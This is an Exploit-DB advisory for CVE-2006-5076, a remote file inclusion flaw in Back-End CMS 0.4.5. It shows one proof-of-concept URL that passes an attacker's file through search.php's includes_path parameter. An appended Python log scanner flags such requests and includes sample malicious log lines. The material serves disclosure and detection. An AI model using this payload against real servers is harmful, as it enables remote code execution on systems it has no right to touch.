Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File Inclusion

2006-09-25T00:00:00
ID EDB-ID:28676
Type exploitdb
Reporter Root3r_H3ll
Modified 2006-09-25T00:00:00

Description

Back-End CMS 0.4.5 search.php includes_path Parameter Remote File Inclusion. CVE-2006-5076. Webapps exploit for the PHP platform.

                                        
source: http://www.securityfocus.com/bid/20207/info
  
Back-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
  
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
  
Back-End CMS version 0.4.5 is vulnerable to these issues.

http://www.example.com/[Path]/search.php?includes_path=attacker's_file
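
Requests of the shape shown above leave a recognizable trace in web server access logs. The following detection sketch is an added example, not code from the advisory or from Back-End CMS; it assumes combined-format access logs, the sample lines and hosts are constructed, and it covers only the search.php / includes_path pair named in the title.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in combined log format; hosts and paths are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2006:10:00:01 +0000] "GET /cms/search.php?q=news HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Sep/2006:10:02:13 +0000] "GET /cms/search.php?includes_path=http%3A%2F%2Ffiles.example.net%2Finc.txt HTTP/1.0" 200 312',
    '192.0.2.44 - - [25/Sep/2006:10:05:40 +0000] "GET /cms/search.php?includes_path=..%2Fincludes HTTP/1.1" 200 498',
    '198.51.100.7 - - [25/Sep/2006:10:06:02 +0000] "GET /cms/search.php?includes_path=ftp%253A%252F%252Ffiles.example.net%252Finc.txt HTTP/1.0" 200 0',
    '192.0.2.10 - - [25/Sep/2006:10:07:19 +0000] "GET /cms/index.php?page=2 HTTP/1.1" 200 4096',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value starting with "scheme:" or "//" points outside the local include tree.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:|//)', re.I)

def classify(line):
    """Return None, 'param-present' or 'remote' for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.lower().endswith('/search.php'):
        return None
    verdict = None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() != 'includes_path':
            continue
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if REMOTE_RE.match(unquote(value)):
            return 'remote'
        # includes_path is an internal setting, so any client-supplied value is notable.
        verdict = 'param-present'
    return verdict

def scan(lines):
    """Return (line number, verdict) for every flagged line, numbering from 1."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((lineno, verdict))
    return hits

if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(lineno, verdict)
```

Only GET query strings are visible in access logs; a value sent in a POST body would need request-body logging or a WAF rule to be seen.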